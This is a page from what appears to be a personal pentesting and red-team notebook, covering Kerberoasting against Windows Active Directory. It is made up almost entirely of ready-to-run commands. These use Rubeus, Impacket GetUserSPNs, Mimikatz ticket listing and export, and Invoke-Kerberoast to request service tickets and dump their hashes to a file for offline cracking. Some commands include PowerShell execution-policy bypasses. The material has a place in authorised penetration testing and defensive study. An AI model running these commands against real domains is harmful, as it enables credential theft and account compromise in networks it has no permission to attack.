🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • Rubeus
  • Getting SPNs
  • Mimikatz
  • Extracting tickets
  • Invoke-Kerberoast
  1. Windows

Kerberoasting

PreviousSeDebugPrivilegeNextLateral Movement

Last updated 2 years ago

If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally

For kerberos to work, times have to be within 5 minutes between attacker and victim.

Rubeus

.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are many ways to do it.

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request  -target-domain ecorp.local ecorp/morph3:Password123@10.10.10.21 -dc-ip 10.10.10.21

Mimikatz

Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Invoke-Kerberoast

This powershell script is always my go to. It works pretty fine

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt

https://github.com/GhostPack/Rubeus
https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1